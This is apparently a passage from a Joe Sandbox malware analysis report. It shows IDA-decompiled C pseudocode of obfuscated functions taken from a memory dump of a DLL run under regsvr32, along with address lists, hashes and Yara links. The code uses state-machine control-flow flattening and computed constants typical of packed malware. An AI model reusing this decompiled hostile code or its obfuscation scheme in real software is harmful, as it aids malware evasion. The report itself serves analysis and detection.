						if(_t207 != 0xf5afaaa) {
							L13:
							if(_t207 != 0x7af518b) {
								continue;
							} else {
								goto L14;
							}
						} else {
							_t213 = E10007209(_t245, _t205, _v100, _v76, _v36, _v52,  &_v32);
							_t248 =  &(_t248[5]);
							_v40 = _t213;
							if(_t213 == 0) {
								_t246 = _v40;
								goto L18;
							} else {
								_t214 = _v32;
								if(_t214 == 0) {
									L14:
									_t246 = _v40;
									if(_t246 == 0) {
										L18:
										E10006A8D(_v84, _v56, _t236);
									} else {
										_t197 = _v20;
										 *_t197 = _t236;
										 *((intOrPtr*)(_t197 + 4)) = _t243 - _t205;
									}
								} else {
									_t245 = _t245 + _t214;
									_t205 = _t205 - _t214;
									if(_t205 != 0) {
										L9:
										_t207 = 0xf5afaaa;
										continue;
									} else {
										_t215 = _t243 + _t243;
										_push(_t215);
										_v24 = _t215;
										_t247 = E1001EAA3(_t215);
										_v28 = _t247;
										if(_t247 == 0) {
											goto L14;
										} else {
											E10011D1C(_t243, _v88, _v92, _v96, _t247, _t236);
											E10006A8D(_v48, _v64, _t236);
											_t236 = _v28;
											_t205 = _t243;
											_t245 = _t247 + _t243;
											_t248 =  &(_t248[5]);
											_t243 = _v24;
											if(_t205 == 0) {
												goto L14;
											} else {
												goto L9;
											}
										}
									}
								}
							}
						}
					}
					return _t246;
				}
				_t207 = 0x556667b;
				goto L13;
			}

0x100141cf
0x100141d6
0x100141da
0x100141de
0x100141e8
0x100141ec
0x100141f4
0x100141fc
0x10014207
0x10014211
0x10014216
0x1001421c
0x10014224
0x1001422c
0x10014234
0x1001423c
0x10014244
0x1001424c
0x10014254
0x1001425c
0x10014264
0x1001426c
0x10014279
0x1001427c
0x10014281
0x1001428a
0x1001428e
0x10014296
0x1001429e
0x100142a6
0x100142ab
0x100142b3
0x100142bb
0x100142c0
0x100142c8
0x100142d0
0x100142e0
0x100142e4
0x100142ec
0x100142f8
0x100142fb
0x100142ff
0x10014307
0x1001430f
0x10014317
0x1001431c
0x10014321
0x10014329
0x10014331
0x10014339
0x10014341
0x10014345
0x1001434d
0x10014355
0x1001435d
0x10014365
0x1001436d
0x10014372
0x1001437a
0x10014382
0x1001438a
0x10014392
0x100143a2
0x100143a7
0x100143ad
0x100143b5
0x100143bd
0x100143c9
0x100143ce
0x100143d4
0x100143e0
0x100143e3
0x100143e7
0x100143eb
0x100143ef
0x100143f3
0x100143f7
0x100143ff
0x1001440c
0x10014410
0x10014418
0x10014420
0x10014432
0x100144e9
0x100144f2
0x100144fa
0x100144ff
0x00000000
0x10014501
0x10014501
0x10014503
0x00000000
0x10014503
0x10014438
0x1001443e
0x1001450c
0x10014512
0x00000000
0x00000000
0x00000000
0x00000000
0x10014444
0x10014462
0x10014464
0x10014467
0x1001446d
0x10014535
0x00000000
0x10014473
0x10014473
0x10014479
0x10014518
0x10014518
0x1001451e
0x10014539
0x10014542
0x10014520
0x10014520
0x10014526
0x10014528
0x10014528
0x1001447f
0x1001447f
0x10014481
0x10014483
0x100144db
0x100144db
0x00000000
0x10014485
0x10014489
0x10014490
0x10014491
0x1001449a
0x1001449c
0x100144a3
0x00000000
0x100144a5
0x100144b5
0x100144c3
0x100144c8
0x100144cc
0x100144ce
0x100144d0
0x100144d3
0x100144d9
0x00000000
0x00000000
0x00000000
0x00000000
0x100144d9
0x100144a3
0x10014483
0x10014479
0x1001446d
0x1001443e
0x10014534
0x10014534
0x10014507
0x00000000

Strings

~G, xrefs: 1001426C

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ~G
API String ID: 0-417174196
Opcode ID: 39191121073e92acf10896babafa536fa168be9461691a290dd32dfecb85a380
Instruction ID: 54f641883b951b61b20ae782b41259e3eac7184783f682e0d983fbfa3ff65f81
Opcode Fuzzy Hash: 39191121073e92acf10896babafa536fa168be9461691a290dd32dfecb85a380
Instruction Fuzzy Hash: DD9120B16083419FC354CF2AD58450FBBF1EBC9B58F41891DF59AAA260D7B1DA09CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1001B687 Relevance: 1.4, Strings: 1, Instructions: 196
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1001B687(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t164;
				void* _t176;
				void* _t178;
				void* _t180;
				void* _t182;
				signed int _t185;
				signed int _t186;
				void* _t189;
				intOrPtr _t212;
				signed int* _t215;

				_push(_a8);
				_t211 = _a4;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t164);
				_v68 = 0x52e51d;
				_t212 = 0;
				_v64 = 0;
				_t215 =  &(( &_v140)[4]);
				_v96 = 0x372ac6;
				_v96 = _v96 + 0xffffdcf7;
				_t189 = 0x5601ca7;
				_v96 = _v96 ^ 0x003d6b02;
				_v76 = 0x1739c9;
				_v76 = _v76 << 0xf;
				_v76 = _v76 ^ 0x9cee79bb;
				_v120 = 0xe198fe;
				_t185 = 0x2b;
				_v120 = _v120 / _t185;
				_v120 = _v120 | 0x46a93c3b;
				_v120 = _v120 ^ 0x46ae95e7;
				_v80 = 0x5d46d2;
				_v80 = _v80 + 0xb9c3;
				_v80 = _v80 ^ 0x0052fdd3;
				_v116 = 0xba8ce9;
				_v116 = _v116 << 3;
				_v116 = _v116 ^ 0xdc8ab54f;
				_v116 = _v116 ^ 0xd959b3f6;
				_v88 = 0x6fbb58;
				_v88 = _v88 << 0xc;
				_v88 = _v88 ^ 0xfbbebcc5;
				_v104 = 0xdd384a;
				_v104 = _v104 << 9;
				_t186 = 0x34;
				_v104 = _v104 / _t186;
				_v104 = _v104 ^ 0x03999fd0;
				_v112 = 0x3d6912;
				_v112 = _v112 << 0x10;
				_v112 = _v112 << 9;
				_v112 = _v112 ^ 0x2405dc0b;
				_v84 = 0xc3162b;
				_v84 = _v84 >> 0xe;
				_v84 = _v84 ^ 0x0003af38;
				_v136 = 0x471c0d;
				_v136 = _v136 * 0x57;
				_v136 = _v136 << 2;
				_v136 = _v136 | 0xfd32bfa2;
				_v136 = _v136 ^ 0xfdb13fed;
				_v108 = 0xcfd3f1;
				_v108 = _v108 << 0xe;
				_v108 = _v108 + 0x9864;
				_v108 = _v108 ^ 0xf4f93fa5;
				_v92 = 0xfffec0;
				_v92 = _v92 | 0xdca1045e;
				_v92 = _v92 ^ 0xdcfe91d5;
				_v128 = 0x2b060a;
				_v128 = _v128 | 0xcbd32620;
				_v128 = _v128 << 4;
				_v128 = _v128 ^ 0x1649bdd2;
				_v128 = _v128 ^ 0xa9f95401;
				_v72 = 0x358943;
				_v72 = _v72 ^ 0x53ca6a6d;
				_v72 = _v72 ^ 0x53fa17b3;
				_v100 = 0x6b20d2;
				_v100 = _v100 + 0x2164;
				_v100 = _v100 + 0xffff43e3;
				_v100 = _v100 ^ 0x0060bfb5;
				_v124 = 0x95da1a;
				_v124 = _v124 >> 6;
				_v124 = _v124 | 0xcf8e010c;
				_v124 = _v124 >> 0x10;
				_v124 = _v124 ^ 0x0005dfef;
				_v132 = 0xbeddd9;
				_v132 = _v132 >> 0xe;
				_v132 = _v132 ^ 0xe7373a8e;
				_v132 = _v132 >> 4;
				_v132 = _v132 ^ 0x0e751a11;
				_v140 = 0xb32edf;
				_v140 = _v140 | 0xc293048c;
				_v140 = _v140 * 0x7c;
				_v140 = _v140 ^ 0x57e974da;
				_v140 = _v140 ^ 0x19294eae;
				do {
					while(_t189 != 0x5601ca7) {
						if(_t189 == 0x5af59b7) {
							__eflags = E1001E831( &_v60, _v100, __eflags, _t211 + 0x40, _v124, _v132, _v140);
							_t212 =  !=  ? 1 : _t212;
						} else {
							if(_t189 == 0x82a529b) {
								_t176 = E10015167(_t211 + 0x38, _v120, _v80,  &_v60, _v116);
								_t215 =  &(_t215[3]);
								__eflags = _t176;
								if(__eflags != 0) {
									_t189 = 0x9baf58c;
									continue;
								}
							} else {
								if(_t189 == 0x9baf58c) {
									_t178 = E10015167(_t211 + 0x24, _v88, _v104,  &_v60, _v112);
									_t215 =  &(_t215[3]);
									__eflags = _t178;
									if(__eflags != 0) {
										_t189 = 0xdc00e20;
										continue;
									}
								} else {
									if(_t189 == 0xad17527) {
										_t180 = E10015167(_t211, _v92, _v128,  &_v60, _v72);
										_t215 =  &(_t215[3]);
										__eflags = _t180;
										if(__eflags != 0) {
											_t189 = 0x5af59b7;
											continue;
										}
									} else {
										if(_t189 == 0xdc00e20) {
											_t182 = E10015167(_t211 + 0x48, _v84, _v136,  &_v60, _v108);
											_t215 =  &(_t215[3]);
											__eflags = _t182;
											if(__eflags != 0) {
												_t189 = 0xad17527;
												continue;
											}
										} else {
											if(_t189 != 0xde3179d) {
												goto L18;
											} else {
												E10004603(_v96, _v76, _a8,  &_v60);
												_t189 = 0x82a529b;
												continue;
											}
										}
									}
								}
							}
						}
						L21:
						return _t212;
					}
					_t189 = 0xde3179d;
					L18:
					__eflags = _t189 - 0x5786934;
				} while (__eflags != 0);
				goto L21;
			}

0x1001b691
0x1001b698
0x1001b69f
0x1001b6a0
0x1001b6a1
0x1001b6a2
0x1001b6a7
0x1001b6af
0x1001b6b1
0x1001b6b5
0x1001b6b8
0x1001b6c2
0x1001b6ca
0x1001b6cf
0x1001b6d7
0x1001b6df
0x1001b6e4
0x1001b6ec
0x1001b6fa
0x1001b6ff
0x1001b705
0x1001b70d
0x1001b715
0x1001b71d
0x1001b725
0x1001b72d
0x1001b735
0x1001b73a
0x1001b742
0x1001b74a
0x1001b752
0x1001b757
0x1001b75f
0x1001b767
0x1001b770
0x1001b773
0x1001b777
0x1001b77f
0x1001b787
0x1001b78c
0x1001b791
0x1001b799
0x1001b7a1
0x1001b7a6
0x1001b7ae
0x1001b7bb
0x1001b7bf
0x1001b7c4
0x1001b7cc
0x1001b7d4
0x1001b7dc
0x1001b7e1
0x1001b7e9
0x1001b7f1
0x1001b7f9
0x1001b801
0x1001b809
0x1001b811
0x1001b819
0x1001b81e
0x1001b826
0x1001b82e
0x1001b836
0x1001b83e
0x1001b846
0x1001b84e
0x1001b856
0x1001b85e
0x1001b866
0x1001b873
0x1001b87d
0x1001b885
0x1001b88a
0x1001b892
0x1001b89a
0x1001b89f
0x1001b8a7
0x1001b8ac
0x1001b8b4
0x1001b8bc
0x1001b8c9
0x1001b8cd
0x1001b8d5
0x1001b8dd
0x1001b8dd
0x1001b8eb
0x1001ba22
0x1001ba24
0x1001b8f1
0x1001b8f7
0x1001b9d9
0x1001b9de
0x1001b9e1
0x1001b9e3
0x1001b9e5
0x00000000
0x1001b9e5
0x1001b8fd
0x1001b8ff
0x1001b9af
0x1001b9b4
0x1001b9b7
0x1001b9b9
0x1001b9bb
0x00000000
0x1001b9bb
0x1001b905
0x1001b90b
0x1001b984
0x1001b989
0x1001b98c
0x1001b98e
0x1001b994
0x00000000
0x1001b994
0x1001b90d
0x1001b913
0x1001b957
0x1001b95c
0x1001b95f
0x1001b961
0x1001b967
0x00000000
0x1001b967
0x1001b915
0x1001b91b
0x00000000
0x1001b921
0x1001b935
0x1001b93c
0x00000000
0x1001b93c
0x1001b91b
0x1001b913
0x1001b90b
0x1001b8ff
0x1001b8f7
0x1001ba28
0x1001ba33
0x1001ba33
0x1001b9ec
0x1001b9f1
0x1001b9f1
0x1001b9f1
0x00000000

Strings

d!, xrefs: 1001B84E

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: d!
API String ID: 0-203533314
Opcode ID: cf92e44992ebbf6015e40d93436e5f6be4c33c6ea1de7dee9ba179b274a5f7bf
Instruction ID: 611f70f3d339d810d377fd0473c2926cad25c1f43c80e4b57890cd6aa613b349
Opcode Fuzzy Hash: cf92e44992ebbf6015e40d93436e5f6be4c33c6ea1de7dee9ba179b274a5f7bf
Instruction Fuzzy Hash: E99112711083819FD759CE21C98A91FBBE5FF84788F10491DF5968A260D7B5CA8ACF83

Uniqueness

Uniqueness Score: -1.00%

Function 1001D6B1 Relevance: 1.4, Strings: 1, Instructions: 181
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1001D6B1() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				short* _t187;
				void* _t192;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed int* _t225;

				_t225 =  &_v596;
				_v564 = 0xa5aa9e;
				_v564 = _v564 >> 1;
				_t192 = 0xc45e3f4;
				_v564 = _v564 >> 0xd;
				_v564 = _v564 ^ 0x000fcde7;
				_v588 = 0xd1c3a;
				_v588 = _v588 | 0xc5f292ab;
				_t218 = 0x3f;
				_v588 = _v588 / _t218;
				_v588 = _v588 + 0xffffd065;
				_v588 = _v588 ^ 0x0328bb6e;
				_v580 = 0xbcb3e2;
				_v580 = _v580 >> 2;
				_v580 = _v580 >> 4;
				_v580 = _v580 ^ 0x517bc481;
				_v580 = _v580 ^ 0x517f9e5e;
				_v568 = 0xad4ce7;
				_v568 = _v568 | 0x9814eeb6;
				_v568 = _v568 + 0xa0df;
				_v568 = _v568 ^ 0x98b23510;
				_v536 = 0x13b2bd;
				_v536 = _v536 + 0xc090;
				_v536 = _v536 ^ 0x00143031;
				_v528 = 0xf4f230;
				_t219 = 0x73;
				_v528 = _v528 * 0x31;
				_v528 = _v528 ^ 0x2ee048c5;
				_v572 = 0xac16bf;
				_v572 = _v572 * 9;
				_v572 = _v572 + 0x52b2;
				_v572 = _v572 ^ 0x06073a9e;
				_v556 = 0x9c151e;
				_v556 = _v556 | 0x612af87b;
				_v556 = _v556 ^ 0x10c2bcc2;
				_v556 = _v556 ^ 0x717fa34d;
				_v548 = 0x32cf40;
				_v548 = _v548 + 0xffffdefd;
				_v548 = _v548 ^ 0x003099c0;
				_v544 = 0x9f8ba0;
				_v544 = _v544 ^ 0xf9184b0c;
				_v544 = _v544 ^ 0xf988d0cf;
				_v560 = 0xde7668;
				_v560 = _v560 + 0x8455;
				_v560 = _v560 * 0x7b;
				_v560 = _v560 ^ 0x6b2c5e64;
				_v596 = 0xe9ff69;
				_v596 = _v596 >> 4;
				_v596 = _v596 / _t219;
				_t220 = 0x1b;
				_v596 = _v596 * 0x2a;
				_v596 = _v596 ^ 0x00063d3a;
				_v552 = 0xa73b5e;
				_v552 = _v552 / _t220;
				_v552 = _v552 + 0xffffae4e;
				_v552 = _v552 ^ 0x000a18c3;
				_v584 = 0x1b36;
				_v584 = _v584 ^ 0x8ecab5b0;
				_v584 = _v584 ^ 0xec27b8f5;
				_v584 = _v584 * 0x17;
				_v584 = _v584 ^ 0xe34aa410;
				_v592 = 0x15bac3;
				_v592 = _v592 >> 4;
				_t221 = 0x66;
				_v592 = _v592 / _t221;
				_t222 = 0x30;
				_v592 = _v592 * 0x3c;
				_v592 = _v592 ^ 0x000a28c7;
				_v532 = 0x19764;
				_v532 = _v532 >> 2;
				_v532 = _v532 ^ 0x0005debd;
				_v576 = 0x12e21a;
				_v576 = _v576 << 1;
				_v576 = _v576 + 0x4100;
				_v576 = _v576 + 0x86fe;
				_v576 = _v576 ^ 0x0027f99b;
				_v540 = 0x8c4d25;
				_v540 = _v540 / _t222;
				_v540 = _v540 ^ 0x0004f09e;
				do {
					while(_t192 != 0x45832ee) {
						if(_t192 == 0x8556fae) {
							_t187 = E1000FFDE(_v552, _v584,  &_v524, _v592);
							 *_t187 = 0;
							_t192 = 0x45832ee;
							continue;
						} else {
							if(_t192 == 0xc45e3f4) {
								_t192 = 0xee521ce;
								continue;
							} else {
								_t231 = _t192 - 0xee521ce;
								if(_t192 == 0xee521ce) {
									_push(_v568);
									_push(_v580);
									_push(_v588);
									E1001734A(_v536, _t231, _v528, _v572, _v556,  &_v524, E10004BB4(0x10001200, _v564), _v548, 0x10001200,  *0x10024208);
									_t187 = E1000B9D7(_v544, _v560, _t188, _v596);
									_t225 =  &(_t225[0xd]);
									_t192 = 0x8556fae;
									continue;
								}
							}
						}
						goto L9;
					}
					E10015D68( &_v524,  &_v524, _v532, _v576, E100072CC, _v540, 0);
					_t225 =  &(_t225[5]);
					_t192 = 0x80521a3;
					L9:
					__eflags = _t192 - 0x80521a3;
				} while (_t192 != 0x80521a3);
				return _t187;
			}

0x1001d6b1
0x1001d6b7
0x1001d6c1
0x1001d6c5
0x1001d6ca
0x1001d6cf
0x1001d6d7
0x1001d6df
0x1001d6f1
0x1001d6f6
0x1001d6fc
0x1001d704
0x1001d70c
0x1001d714
0x1001d719
0x1001d71e
0x1001d726
0x1001d72e
0x1001d736
0x1001d73e
0x1001d746
0x1001d74e
0x1001d756
0x1001d75e
0x1001d766
0x1001d773
0x1001d776
0x1001d77a
0x1001d782
0x1001d78f
0x1001d793
0x1001d79b
0x1001d7a3
0x1001d7ab
0x1001d7b3
0x1001d7bb
0x1001d7c3
0x1001d7cb
0x1001d7d3
0x1001d7db
0x1001d7e3
0x1001d7eb
0x1001d7f3
0x1001d7fb
0x1001d808
0x1001d80c
0x1001d814
0x1001d81c
0x1001d829
0x1001d832
0x1001d833
0x1001d837
0x1001d83f
0x1001d84d
0x1001d851
0x1001d859
0x1001d861
0x1001d869
0x1001d871
0x1001d87e
0x1001d882
0x1001d88a
0x1001d894
0x1001d8a9
0x1001d8ae
0x1001d8be
0x1001d8bf
0x1001d8c3
0x1001d8cb
0x1001d8d3
0x1001d8d8
0x1001d8e0
0x1001d8e8
0x1001d8ec
0x1001d8f4
0x1001d8fc
0x1001d904
0x1001d912
0x1001d916
0x1001d91e
0x1001d91e
0x1001d92c
0x1001d9ca
0x1001d9d3
0x1001d9d6
0x00000000
0x1001d932
0x1001d938
0x1001d9b2
0x00000000
0x1001d93a
0x1001d93a
0x1001d93c
0x1001d942
0x1001d94b
0x1001d94f
0x1001d98e
0x1001d9a0
0x1001d9a5
0x1001d9a8
0x00000000
0x1001d9a8
0x1001d93c
0x1001d938
0x00000000
0x1001d92c
0x1001d9f6
0x1001d9fb
0x1001d9fe
0x1001da00
0x1001da00
0x1001da00
0x1001da12

Strings

d^,k, xrefs: 1001D80C

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: d^,k
API String ID: 0-276000652
Opcode ID: f9911882c1f9f64cb46d0c18376c12fc068fc057c87bc895c550f10541ee36fe
Instruction ID: 59c50e81a3bd5350256ebdb70b1e81f9dc5f8d4c3a99dddafa3c278225d20ad5
Opcode Fuzzy Hash: f9911882c1f9f64cb46d0c18376c12fc068fc057c87bc895c550f10541ee36fe
Instruction Fuzzy Hash: D0812F711083819BC758DF21C98A90FBBE1FBC4758F10891EF5969A260D7B5CA4ACF86

Uniqueness

Uniqueness Score: -1.00%

Function 1000F784 Relevance: 1.4, Strings: 1, Instructions: 152
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E1000F784(signed int* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v116;
				void* __ecx;
				void* _t110;
				signed int _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				void* _t141;
				signed int* _t165;
				void* _t166;
				void* _t167;

				_push(_a12);
				_t164 = _a8;
				_t165 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E10009E7D(_t110);
				_v48 = _v48 & 0x00000000;
				_t167 = _t166 + 0x14;
				_v60 = 0x5fb19d;
				_v56 = 0x389996;
				_t141 = 0xe1da48d;
				_v52 = 0xde722d;
				_v28 = 0x339b2c;
				_v28 = _v28 ^ 0xecae8442;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 ^ 0x000ec9d1;
				_v24 = 0x2b400;
				_v24 = _v24 + 0x6c6e;
				_v24 = _v24 + 0x4665;
				_v24 = _v24 ^ 0x00000ab1;
				_v12 = 0x706b07;
				_t135 = 0x5b;
				_v12 = _v12 / _t135;
				_t136 = 0x28;
				_v12 = _v12 * 0x6b;
				_v12 = _v12 * 0x23;
				_v12 = _v12 ^ 0x121fe6ec;
				_v36 = 0x4f7bec;
				_v36 = _v36 / _t136;
				_v36 = _v36 + 0xaef4;
				_v36 = _v36 ^ 0x000bbc85;
				_v32 = 0x490df7;
				_v32 = _v32 >> 0xd;
				_t137 = 7;
				_v32 = _v32 / _t137;
				_v32 = _v32 ^ 0x000db033;
				_v20 = 0x47af53;
				_v20 = _v20 ^ 0xc8eccfa3;
				_v20 = _v20 >> 7;
				_t138 = 0x63;
				_v20 = _v20 / _t138;
				_v20 = _v20 ^ 0x000349cc;
				_v16 = 0x27b15b;
				_v16 = _v16 << 0xc;
				_v16 = _v16 + 0xffff47d0;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x01eb1351;
				_v40 = 0xb05342;
				_v40 = _v40 >> 3;
				_v40 = _v40 + 0xc2b3;
				_v40 = _v40 ^ 0x0015fb37;
				_v44 = 0xc17a09;
				_v44 = _v44 << 0x10;
				_v44 = _v44 ^ 0x7a05304e;
				while(_t141 != 0x4ec777) {
					if(_t141 == 0xb877aa4) {
						E10004603(_v36, _v32, _t165,  &_v116);
						_t141 = 0xbf6e9a0;
						continue;
					} else {
						if(_t141 == 0xbf6e9a0) {
							E10006BDB( *_t164, _v20,  &_v116, _v16);
							_t167 = _t167 + 8;
							_t141 = 0xe4e1a56;
							continue;
						} else {
							if(_t141 == 0xe1da48d) {
								_t141 = 0x4ec777;
								 *_t165 =  *_t165 & 0x00000000;
								_t165[1] = _v28;
								continue;
							} else {
								if(_t141 == 0xe4e1a56) {
									E10004627(_v40, _t164 + 4, __eflags, _v44,  &_v116);
								} else {
									if(_t141 != 0xf199cb2) {
										L13:
										__eflags = _t141 - 0x6042209;
										if(__eflags != 0) {
											continue;
										} else {
										}
									} else {
										_push(_t141);
										_t134 = E1001EAA3(_t165[1]);
										 *_t165 = _t134;
										if(_t134 != 0) {
											_t141 = 0xb877aa4;
											continue;
										}
									}
								}
							}
						}
					}
					__eflags =  *_t165;
					_t109 =  *_t165 != 0;
					__eflags = _t109;
					return 0 | _t109;
				}
				_t165[1] = E1001DE11(_t164);
				_t141 = 0xf199cb2;
				goto L13;
			}

0x1000f78d
0x1000f790
0x1000f793
0x1000f795
0x1000f796
0x1000f799
0x1000f79b
0x1000f7a0
0x1000f7a4
0x1000f7a7
0x1000f7b0
0x1000f7b7
0x1000f7bc
0x1000f7c3
0x1000f7ca
0x1000f7d1
0x1000f7d5
0x1000f7dc
0x1000f7e3
0x1000f7ea
0x1000f7f1
0x1000f7f8
0x1000f804
0x1000f809
0x1000f812
0x1000f815
0x1000f81c
0x1000f81f
0x1000f826
0x1000f834
0x1000f837
0x1000f83e
0x1000f845
0x1000f84c
0x1000f853
0x1000f858
0x1000f85d
0x1000f864
0x1000f86b
0x1000f872
0x1000f879
0x1000f881
0x1000f884
0x1000f88b
0x1000f892
0x1000f896
0x1000f89d
0x1000f8a1
0x1000f8a8
0x1000f8af
0x1000f8b3
0x1000f8ba
0x1000f8c1
0x1000f8c8
0x1000f8cc
0x1000f8d3
0x1000f8e1
0x1000f957
0x1000f95e
0x00000000
0x1000f8e3
0x1000f8e9
0x1000f93d
0x1000f942
0x1000f945
0x00000000
0x1000f8eb
0x1000f8f1
0x1000f924
0x1000f929
0x1000f92c
0x00000000
0x1000f8f3
0x1000f8f9
0x1000f992
0x1000f8ff
0x1000f905
0x1000f977
0x1000f977
0x1000f97d
0x00000000
0x00000000
0x1000f983
0x1000f907
0x1000f90d
0x1000f911
0x1000f916
0x1000f91b
0x1000f91d
0x00000000
0x1000f91d
0x1000f91b
0x1000f905
0x1000f8f9
0x1000f8f1
0x1000f8e9
0x1000f99b
0x1000f99f
0x1000f99f
0x1000f9a6
0x1000f9a6
0x1000f96f
0x1000f972
0x00000000

Strings

{O, xrefs: 1000F826

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: {O
API String ID: 0-3466160288
Opcode ID: 7b6e9314d53585c05d9ba6454145f77e2571b00d0696d09d4a7b3ca4b2685240
Instruction ID: cc18efd7bdfa43b136fdd71a42b21f13939fdcf024ea1f0f56374ada1bb2cfbb
Opcode Fuzzy Hash: 7b6e9314d53585c05d9ba6454145f77e2571b00d0696d09d4a7b3ca4b2685240
Instruction Fuzzy Hash: 3F5158B1D04209ABDF04CFA0D889AEEBBF1FF44358F20801ED512BA640D7B95A45CF95

Uniqueness

Uniqueness Score: -1.00%

Function 1001EC9B Relevance: 1.4, Strings: 1, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1001EC9B() {
				char _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _t124;
				signed int _t131;
				signed int _t134;
				signed int _t135;
				void* _t136;
				signed int _t138;
				signed int _t151;
				intOrPtr _t153;
				signed int _t154;
				signed int* _t155;

				_t155 =  &_v580;
				_v536 = 0xe88b35;
				_v532 = 0xe1da7;
				_t136 = 0xc4515;
				_t153 = 0;
				_v528 = 0;
				_v556 = 0x89cbfd;
				_v556 = _v556 >> 6;
				_v556 = _v556 | 0x6d62f47d;
				_v556 = _v556 ^ 0x6d6d4bc5;
				_v552 = 0xaaf0fe;
				_v552 = _v552 + 0xffff6d53;
				_v552 = _v552 << 9;
				_v552 = _v552 ^ 0x54bd76d1;
				_v564 = 0x6eaf91;
				_v564 = _v564 << 0x10;
				_v564 = _v564 ^ 0xaf9a7d64;
				_v580 = 0x7471de;
				_t151 = 0x3f;
				_t135 = _v564;
				_v580 = _v580 / _t151;
				_v580 = _v580 + 0xfffff145;
				_v580 = _v580 >> 0xb;
				_v580 = _v580 ^ 0x000c70a1;
				_v560 = 0xad4c77;
				_v560 = _v560 | 0x0de1cde4;
				_t154 = _v564;
				_t152 = _v564;
				_v560 = _v560 * 0x5b;
				_v560 = _v560 ^ 0xf38add68;
				_v576 = 0x9bbf5f;
				_v576 = _v576 + 0x8a8f;
				_v576 = _v576 >> 7;
				_v576 = _v576 + 0xffffc9a2;
				_v576 = _v576 ^ 0x00075a3b;
				_v548 = 0xa30f12;
				_v548 = _v548 + 0x82f4;
				_v548 = _v548 ^ 0xba2ecb21;
				_v548 = _v548 ^ 0xba88f0a7;
				_v540 = 0x6d30e5;
				_v540 = _v540 * 0x75;
				_v540 = _v540 ^ 0x31e66386;
				_v572 = 0xb1a9ae;
				_v572 = _v572 + 0xffff1516;
				_v572 = _v572 ^ 0xcf239d19;
				_v572 = _v572 ^ 0xd44be312;
				_v572 = _v572 ^ 0x1bdbd8e5;
				_v544 = 0x3ef7d9;
				_v544 = _v544 | 0xb2adf54a;
				_v544 = _v544 + 0xeea;
				_v544 = _v544 ^ 0xb2cb9f73;
				_v568 = 0x3c7f90;
				_v568 = _v568 | 0x53737bca;
				_v568 = _v568 ^ 0x8aca3b95;
				_v568 = _v568 ^ 0x8c8f99c0;
				_v568 = _v568 ^ 0x55336efa;
				do {
					while(_t136 != 0xc4515) {
						if(_t136 == 0x58fbbe6) {
							_push(_t136);
							_t124 = E10010C7C(_v552, _v564, __eflags,  &_v524, _v580, _t152);
							_t155 =  &(_t155[4]);
							__eflags = _t124;
							if(__eflags != 0) {
								_t136 = 0xea5d2c9;
								continue;
							}
						} else {
							if(_t136 == 0x5933b46) {
